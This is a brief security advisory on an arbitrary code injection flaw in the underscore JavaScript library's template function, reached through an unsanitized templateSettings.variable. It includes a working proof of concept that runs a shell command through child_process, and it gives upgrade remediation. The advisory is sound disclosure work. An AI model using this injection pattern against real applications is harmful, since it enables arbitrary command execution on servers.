underscore is a JavaScript's functional programming helper library.
Affected versions of this package are vulnerable to Arbitrary Code Injection via the template function, particularly when the variable option is taken from _.templateSettings as it is not sanitized.
PoC
const _ = require('underscore');
_.templateSettings.variable = "a = this.process.mainModule.require('child_process').execSync('touch HELLO')";
const t = _.template("")();
Remediation
Upgrade underscore to version 1.13.0-2, 1.12.1 or higher.